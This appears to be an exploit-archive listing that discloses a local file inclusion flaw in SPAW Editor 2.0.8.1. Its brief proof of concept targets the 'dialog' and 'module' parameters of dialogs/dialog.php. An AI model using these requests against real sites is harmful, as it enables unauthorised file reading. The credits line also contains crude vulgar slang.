SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability
# Published : 2010-10-05
# Author : soorakh kos
# Previous Title : Cag CMS Version 0.2 <= XSS & Blind SQL Injection Multiple Vulnerabilities
# Next Title : CuteNews (index.php?page) Local File Inclusion Vulnerability

# Exploit Title: local file include 
# Date: 
# Author: soorakh kos

# Software Link: http://sourceforge.net/projects/spaw/files/spaw-php/SPAW%20PHP%20v.2.0.8.1/spaw-php-2081-gpl.zip/download

# Version: SPAW Editor v.2

# Thanks:  kose roya , kose soosan , kose amam,kose dokhtar amam ,and all jaghi iranian boys
-----------


vul code: /path/dialogs/dialog.php

------------------------------------------------

poc:
/path/dialogs/dialog.php?dialog=lfi
/path/dialogs/dialog.php?module=lfi